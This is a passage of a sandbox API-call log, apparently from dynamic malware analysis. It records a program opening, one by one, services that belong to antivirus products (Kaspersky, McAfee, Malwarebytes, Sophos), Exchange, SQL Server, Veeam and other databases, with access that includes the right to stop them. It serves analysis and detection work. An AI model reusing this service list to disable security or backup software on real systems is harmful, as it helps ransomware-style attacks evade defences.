(lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835298 [0101.113] OpenServiceW (hSCManager=0x6835298, lpServiceName="EsgShKernel", dwDesiredAccess=0x2c) returned 0x0 [0101.113] CloseServiceHandle (hSCObject=0x6835298) returned 1 [0101.113] GetTickCount () returned 0x115bbda [0101.113] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.114] OpenServiceW (hSCManager=0x6835338, lpServiceName="FA_Scheduler", dwDesiredAccess=0x2c) returned 0x0 [0101.114] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.114] GetTickCount () returned 0x115bbda [0101.114] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.114] OpenServiceW (hSCManager=0x6835360, lpServiceName="IISAdmin", dwDesiredAccess=0x2c) returned 0x0 [0101.115] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.115] GetTickCount () returned 0x115bbda [0101.115] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.115] OpenServiceW (hSCManager=0x6835270, lpServiceName="IMAP4Svc", dwDesiredAccess=0x2c) returned 0x0 [0101.115] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.116] GetTickCount () returned 0x115bbda [0101.116] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835428 [0101.116] OpenServiceW (hSCManager=0x6835428, lpServiceName="KAVFS", dwDesiredAccess=0x2c) returned 0x0 [0101.116] CloseServiceHandle (hSCObject=0x6835428) returned 1 [0101.116] GetTickCount () returned 0x115bbda [0101.116] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.117] OpenServiceW (hSCManager=0x6835338, lpServiceName="KAVFSGT", dwDesiredAccess=0x2c) returned 0x0 [0101.117] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.117] GetTickCount () returned 0x115bbda [0101.117] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835388 [0101.117] OpenServiceW (hSCManager=0x6835388, lpServiceName="MBAMService", dwDesiredAccess=0x2c) returned 0x0 [0101.118] CloseServiceHandle (hSCObject=0x6835388) returned 1 [0101.118] GetTickCount () returned 0x115bbda [0101.118] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.118] OpenServiceW (hSCManager=0x68353d8, lpServiceName="MBEndpointAgent", dwDesiredAccess=0x2c) returned 0x0 [0101.118] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.119] GetTickCount () returned 0x115bbda [0101.119] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68354a0 [0101.119] OpenServiceW (hSCManager=0x68354a0, lpServiceName="MMS", dwDesiredAccess=0x2c) returned 0x0 [0101.119] CloseServiceHandle (hSCObject=0x68354a0) returned 1 [0101.119] GetTickCount () returned 0x115bbda [0101.119] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.120] OpenServiceW (hSCManager=0x68353b0, lpServiceName="MSExchangeAB", dwDesiredAccess=0x2c) returned 0x0 [0101.120] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.122] GetTickCount () returned 0x115bbea [0101.122] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.122] OpenServiceW (hSCManager=0x6835270, lpServiceName="MSExchangeADTopology", dwDesiredAccess=0x2c) returned 0x0 [0101.122] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.122] GetTickCount () returned 0x115bbea [0101.122] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.123] OpenServiceW (hSCManager=0x6835478, lpServiceName="MSExchangeAntispamUpdate", dwDesiredAccess=0x2c) returned 0x0 [0101.123] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.123] GetTickCount () returned 0x115bbea [0101.123] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.123] OpenServiceW (hSCManager=0x6835338, lpServiceName="MSExchangeES", dwDesiredAccess=0x2c) returned 0x0 [0101.124] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.124] GetTickCount () returned 0x115bbea [0101.124] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.124] OpenServiceW (hSCManager=0x6835360, lpServiceName="MSExchangeEdgeSync", dwDesiredAccess=0x2c) returned 0x0 [0101.124] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.125] GetTickCount () returned 0x115bbea [0101.125] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.125] OpenServiceW (hSCManager=0x6835400, lpServiceName="MSExchangeFBA", dwDesiredAccess=0x2c) returned 0x0 [0101.125] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.125] GetTickCount () returned 0x115bbea [0101.125] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.126] OpenServiceW (hSCManager=0x68352e8, lpServiceName="MSExchangeFDS", dwDesiredAccess=0x2c) returned 0x0 [0101.126] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.126] GetTickCount () returned 0x115bbea [0101.126] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.126] OpenServiceW (hSCManager=0x6835338, lpServiceName="MSExchangeIS", dwDesiredAccess=0x2c) returned 0x0 [0101.127] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.127] GetTickCount () returned 0x115bbea [0101.127] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835388 [0101.127] OpenServiceW (hSCManager=0x6835388, lpServiceName="MSExchangeMGMT", dwDesiredAccess=0x2c) returned 0x0 [0101.127] CloseServiceHandle (hSCObject=0x6835388) returned 1 [0101.128] GetTickCount () returned 0x115bbea [0101.128] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352c0 [0101.128] OpenServiceW (hSCManager=0x68352c0, lpServiceName="MSExchangeMTA", dwDesiredAccess=0x2c) returned 0x0 [0101.128] CloseServiceHandle (hSCObject=0x68352c0) returned 1 [0101.128] GetTickCount () returned 0x115bbea [0101.128] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835428 [0101.129] OpenServiceW (hSCManager=0x6835428, lpServiceName="MSExchangeMailSubmission", dwDesiredAccess=0x2c) returned 0x0 [0101.129] CloseServiceHandle (hSCObject=0x6835428) returned 1 [0101.129] GetTickCount () returned 0x115bbea [0101.129] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835298 [0101.129] OpenServiceW (hSCManager=0x6835298, lpServiceName="MSExchangeMailboxAssistants", dwDesiredAccess=0x2c) returned 0x0 [0101.129] CloseServiceHandle (hSCObject=0x6835298) returned 1 [0101.130] GetTickCount () returned 0x115bbea [0101.130] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.130] OpenServiceW (hSCManager=0x68352e8, lpServiceName="MSExchangeMailboxReplication", dwDesiredAccess=0x2c) returned 0x0 [0101.130] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.130] GetTickCount () returned 0x115bbea [0101.130] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.131] OpenServiceW (hSCManager=0x6835338, lpServiceName="MSExchangeProtectedServiceHost", dwDesiredAccess=0x2c) returned 0x0 [0101.131] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.131] GetTickCount () returned 0x115bbea [0101.131] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.131] OpenServiceW (hSCManager=0x6835338, lpServiceName="MSExchangeRPC", dwDesiredAccess=0x2c) returned 0x0 [0101.132] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.132] GetTickCount () returned 0x115bbea [0101.132] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68351f8 [0101.132] OpenServiceW (hSCManager=0x68351f8, lpServiceName="MSExchangeRepl", dwDesiredAccess=0x2c) returned 0x0 [0101.132] CloseServiceHandle (hSCObject=0x68351f8) returned 1 [0101.133] GetTickCount () returned 0x115bbea [0101.133] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.133] OpenServiceW (hSCManager=0x6835338, lpServiceName="MSExchangeSA", dwDesiredAccess=0x2c) returned 0x0 [0101.133] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.133] GetTickCount () returned 0x115bbea [0101.133] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68351f8 [0101.139] OpenServiceW (hSCManager=0x68351f8, lpServiceName="MSExchangeSRS", dwDesiredAccess=0x2c) returned 0x0 [0101.140] CloseServiceHandle (hSCObject=0x68351f8) returned 1 [0101.140] GetTickCount () returned 0x115bbf9 [0101.140] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.140] OpenServiceW (hSCManager=0x68352e8, lpServiceName="MSExchangeSearch", dwDesiredAccess=0x2c) returned 0x0 [0101.140] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.141] GetTickCount () returned 0x115bbf9 [0101.141] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.141] OpenServiceW (hSCManager=0x68352e8, lpServiceName="MSExchangeServiceHost", dwDesiredAccess=0x2c) returned 0x0 [0101.141] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.141] GetTickCount () returned 0x115bbf9 [0101.141] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.142] OpenServiceW (hSCManager=0x68352e8, lpServiceName="MSExchangeThrottling", dwDesiredAccess=0x2c) returned 0x0 [0101.142] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.142] GetTickCount () returned 0x115bbf9 [0101.142] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835298 [0101.142] OpenServiceW (hSCManager=0x6835298, lpServiceName="MSExchangeTransport", dwDesiredAccess=0x2c) returned 0x0 [0101.143] CloseServiceHandle (hSCObject=0x6835298) returned 1 [0101.143] GetTickCount () returned 0x115bbf9 [0101.143] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.143] OpenServiceW (hSCManager=0x6835338, lpServiceName="MSExchangeTransportLogSearch", dwDesiredAccess=0x2c) returned 0x0 [0101.143] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.144] GetTickCount () returned 0x115bbf9 [0101.144] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.144] OpenServiceW (hSCManager=0x6835338, lpServiceName="MSOLAP$SQL_2008", dwDesiredAccess=0x2c) returned 0x0 [0101.144] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.144] GetTickCount () returned 0x115bbf9 [0101.144] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835388 [0101.145] OpenServiceW (hSCManager=0x6835388, lpServiceName="MSOLAP$SYSTEM_BGC", dwDesiredAccess=0x2c) returned 0x0 [0101.145] CloseServiceHandle (hSCObject=0x6835388) returned 1 [0101.145] GetTickCount () returned 0x115bbf9 [0101.145] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.145] OpenServiceW (hSCManager=0x6835478, lpServiceName="MSOLAP$TPS", dwDesiredAccess=0x2c) returned 0x0 [0101.146] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.146] GetTickCount () returned 0x115bbf9 [0101.146] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835248 [0101.147] OpenServiceW (hSCManager=0x6835248, lpServiceName="MSOLAP$TPSAMA", dwDesiredAccess=0x2c) returned 0x0 [0101.147] CloseServiceHandle (hSCObject=0x6835248) returned 1 [0101.147] GetTickCount () returned 0x115bbf9 [0101.147] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.147] OpenServiceW (hSCManager=0x6835400, lpServiceName="MSSQL$BKUPEXEC", dwDesiredAccess=0x2c) returned 0x0 [0101.148] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.148] GetTickCount () returned 0x115bbf9 [0101.148] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835248 [0101.148] OpenServiceW (hSCManager=0x6835248, lpServiceName="MSSQL$ECWDB2", dwDesiredAccess=0x2c) returned 0x0 [0101.148] CloseServiceHandle (hSCObject=0x6835248) returned 1 [0101.148] GetTickCount () returned 0x115bbf9 [0101.149] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.149] OpenServiceW (hSCManager=0x6835400, lpServiceName="MSSQL$PRACTICEMGT", dwDesiredAccess=0x2c) returned 0x0 [0101.149] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.149] GetTickCount () returned 0x115bbf9 [0101.149] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.150] OpenServiceW (hSCManager=0x6835270, lpServiceName="MSSQL$PRACTTICEBGC", dwDesiredAccess=0x2c) returned 0x0 [0101.150] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.150] GetTickCount () returned 0x115bbf9 [0101.150] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.150] OpenServiceW (hSCManager=0x6835338, lpServiceName="MSSQL$PROD", dwDesiredAccess=0x2c) returned 0x0 [0101.150] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.151] GetTickCount () returned 0x115bbf9 [0101.151] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.151] OpenServiceW (hSCManager=0x6835220, lpServiceName="MSSQL$PROFXENGAGEMENT", dwDesiredAccess=0x2c) returned 0x0 [0101.151] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.151] GetTickCount () returned 0x115bbf9 [0101.151] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.160] OpenServiceW (hSCManager=0x68353d8, lpServiceName="MSSQL$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0101.160] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.160] GetTickCount () returned 0x115bc09 [0101.160] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.160] OpenServiceW (hSCManager=0x6835270, lpServiceName="MSSQL$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0101.161] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.161] GetTickCount () returned 0x115bc09 [0101.161] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68351f8 [0101.161] OpenServiceW (hSCManager=0x68351f8, lpServiceName="MSSQL$SOPHOS", dwDesiredAccess=0x2c) returned 0x0 [0101.161] CloseServiceHandle (hSCObject=0x68351f8) returned 1 [0101.162] GetTickCount () returned 0x115bc09 [0101.162] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.162] OpenServiceW (hSCManager=0x68353d8, lpServiceName="MSSQL$SQLEXPRESS", dwDesiredAccess=0x2c) returned 0x0 [0101.162] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.162] GetTickCount () returned 0x115bc09 [0101.162] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352c0 [0101.163] OpenServiceW (hSCManager=0x68352c0, lpServiceName="MSSQL$SQL_2008", dwDesiredAccess=0x2c) returned 0x0 [0101.163] CloseServiceHandle (hSCObject=0x68352c0) returned 1 [0101.163] GetTickCount () returned 0x115bc09 [0101.163] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.163] OpenServiceW (hSCManager=0x6835220, lpServiceName="MSSQL$SYSTEM_BGC", dwDesiredAccess=0x2c) returned 0x0 [0101.164] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.164] GetTickCount () returned 0x115bc09 [0101.164] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.164] OpenServiceW (hSCManager=0x6835360, lpServiceName="MSSQL$TPS", dwDesiredAccess=0x2c) returned 0x0 [0101.164] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.165] GetTickCount () returned 0x115bc09 [0101.165] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68354a0 [0101.165] OpenServiceW (hSCManager=0x68354a0, lpServiceName="MSSQL$TPSAMA", dwDesiredAccess=0x2c) returned 0x0 [0101.165] CloseServiceHandle (hSCObject=0x68354a0) returned 1 [0101.165] GetTickCount () returned 0x115bc09 [0101.165] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.166] OpenServiceW (hSCManager=0x6835478, lpServiceName="MSSQL$VEEAMSQL2008R2", dwDesiredAccess=0x2c) returned 0x0 [0101.166] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.166] GetTickCount () returned 0x115bc09 [0101.166] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.166] OpenServiceW (hSCManager=0x6835338, lpServiceName="MSSQL$VEEAMSQL2012", dwDesiredAccess=0x2c) returned 0x0 [0101.167] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.167] GetTickCount () returned 0x115bc09 [0101.167] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835298 [0101.167] OpenServiceW (hSCManager=0x6835298, lpServiceName="MSSQLFDLauncher", dwDesiredAccess=0x2c) returned 0x0 [0101.167] CloseServiceHandle (hSCObject=0x6835298) returned 1 [0101.167] GetTickCount () returned 0x115bc09 [0101.167] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835388 [0101.168] OpenServiceW (hSCManager=0x6835388, lpServiceName="MSSQLFDLauncher$PROFXENGAGEMENT", dwDesiredAccess=0x2c) returned 0x0 [0101.168] CloseServiceHandle (hSCObject=0x6835388) returned 1 [0101.168] GetTickCount () returned 0x115bc19 [0101.168] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352c0 [0101.169] OpenServiceW (hSCManager=0x68352c0, lpServiceName="MSSQLFDLauncher$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0101.169] CloseServiceHandle (hSCObject=0x68352c0) returned 1 [0101.169] GetTickCount () returned 0x115bc19 [0101.169] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68351f8 [0101.169] OpenServiceW (hSCManager=0x68351f8, lpServiceName="MSSQLFDLauncher$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0101.170] CloseServiceHandle (hSCObject=0x68351f8) returned 1 [0101.170] GetTickCount () returned 0x115bc19 [0101.170] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.170] OpenServiceW (hSCManager=0x68353d8, lpServiceName="MSSQLFDLauncher$SQL_2008", dwDesiredAccess=0x2c) returned 0x0 [0101.170] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.171] GetTickCount () returned 0x115bc19 [0101.171] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.171] OpenServiceW (hSCManager=0x68352e8, lpServiceName="MSSQLFDLauncher$SYSTEM_BGC", dwDesiredAccess=0x2c) returned 0x0 [0101.171] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.171] GetTickCount () returned 0x115bc19 [0101.171] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352c0 [0101.172] OpenServiceW (hSCManager=0x68352c0, lpServiceName="MSSQLFDLauncher$TPS", dwDesiredAccess=0x2c) returned 0x0 [0101.172] CloseServiceHandle (hSCObject=0x68352c0) returned 1 [0101.173] GetTickCount () returned 0x115bc19 [0101.173] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.173] OpenServiceW (hSCManager=0x6835338, lpServiceName="MSSQLFDLauncher$TPSAMA", dwDesiredAccess=0x2c) returned 0x0 [0101.173] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.173] GetTickCount () returned 0x115bc19 [0101.173] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352c0 [0101.174] OpenServiceW (hSCManager=0x68352c0, lpServiceName="MSSQLSERVER", dwDesiredAccess=0x2c) returned 0x0 [0101.174] CloseServiceHandle (hSCObject=0x68352c0) returned 1 [0101.174] GetTickCount () returned 0x115bc19 [0101.174] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.174] OpenServiceW (hSCManager=0x6835360, lpServiceName="MSSQLServerADHelper", dwDesiredAccess=0x2c) returned 0x0 [0101.175] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.175] GetTickCount () returned 0x115bc19 [0101.175] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.175] OpenServiceW (hSCManager=0x6835360, lpServiceName="MSSQLServerADHelper100", dwDesiredAccess=0x2c) returned 0x0 [0101.175] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.176] GetTickCount () returned 0x115bc19 [0101.176] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.176] OpenServiceW (hSCManager=0x6835400, lpServiceName="MSSQLServerOLAPService", dwDesiredAccess=0x2c) returned 0x0 [0101.176] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.176] GetTickCount () returned 0x115bc19 [0101.176] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.177] OpenServiceW (hSCManager=0x6835220, lpServiceName="McAfeeEngineService", dwDesiredAccess=0x2c) returned 0x0 [0101.177] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.177] GetTickCount () returned 0x115bc19 [0101.177] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.177] OpenServiceW (hSCManager=0x6835338, lpServiceName="McAfeeFramework", dwDesiredAccess=0x2c) returned 0x0 [0101.178] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.178] GetTickCount () returned 0x115bc19 [0101.178] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835248 [0101.178] OpenServiceW (hSCManager=0x6835248, lpServiceName="McAfeeFrameworkMcAfeeFramework", dwDesiredAccess=0x2c) returned 0x0 [0101.178] CloseServiceHandle (hSCObject=0x6835248) returned 1 [0101.178] GetTickCount () returned 0x115bc19 [0101.178] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835298 [0101.179] OpenServiceW (hSCManager=0x6835298, lpServiceName="McShield", dwDesiredAccess=0x2c) returned 0x0 [0101.179] CloseServiceHandle (hSCObject=0x6835298) returned 1 [0101.179] GetTickCount () returned 0x115bc19 [0101.179] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.179] OpenServiceW (hSCManager=0x68353b0, lpServiceName="McTaskManager", dwDesiredAccess=0x2c) returned 0x0 [0101.180] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.180] GetTickCount () returned 0x115bc19 [0101.180] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835428 [0101.180] OpenServiceW (hSCManager=0x6835428, lpServiceName="MongoDB", dwDesiredAccess=0x2c) returned 0x0 [0101.180] CloseServiceHandle (hSCObject=0x6835428) returned 1 [0101.181] GetTickCount () returned 0x115bc19 [0101.181] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835248 [0101.181] OpenServiceW (hSCManager=0x6835248, lpServiceName="MsDtsServer", dwDesiredAccess=0x2c) returned 0x0 [0101.181] CloseServiceHandle (hSCObject=0x6835248) returned 1 [0101.181] GetTickCount () returned 0x115bc19 [0101.181] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.182] OpenServiceW (hSCManager=0x6835220, lpServiceName="MsDtsServer100", dwDesiredAccess=0x2c) returned 0x0 [0101.182] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.182] GetTickCount () returned 0x115bc19 [0101.182] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.182] OpenServiceW (hSCManager=0x6835400, lpServiceName="MsDtsServer110", dwDesiredAccess=0x2c) returned 0x0 [0101.183] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.183] GetTickCount () returned 0x115bc19 [0101.183] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.183] OpenServiceW (hSCManager=0x68353d8, lpServiceName="MySQL57", dwDesiredAccess=0x2c) returned 0x0 [0101.183] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.184] GetTickCount () returned 0x115bc28 [0101.184] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835248 [0101.184] OpenServiceW (hSCManager=0x6835248, lpServiceName="MySQL80", dwDesiredAccess=0x2c) returned 0x0 [0101.185] CloseServiceHandle (hSCObject=0x6835248) returned 1 [0101.185] GetTickCount () returned 0x115bc28 [0101.185] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.186] OpenServiceW (hSCManager=0x68353b0, lpServiceName="nginx", dwDesiredAccess=0x2c) returned 0x0 [0101.186] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.186] GetTickCount () returned 0x115bc28 [0101.186] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.186] OpenServiceW (hSCManager=0x68352e8, lpServiceName="NetMsmqActivator", dwDesiredAccess=0x2c) returned 0x0 [0101.187] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.187] GetTickCount () returned 0x115bc28 [0101.187] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68351f8 [0101.187] OpenServiceW (hSCManager=0x68351f8, lpServiceName="OracleClientCache80", dwDesiredAccess=0x2c) returned 0x0 [0101.187] CloseServiceHandle (hSCObject=0x68351f8) returned 1 [0101.188] GetTickCount () returned 0x115bc28 [0101.188] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.188] OpenServiceW (hSCManager=0x6835270, lpServiceName="OracleServiceXE", dwDesiredAccess=0x2c) returned 0x0 [0101.188] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.188] GetTickCount () returned 0x115bc28 [0101.188] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.189] OpenServiceW 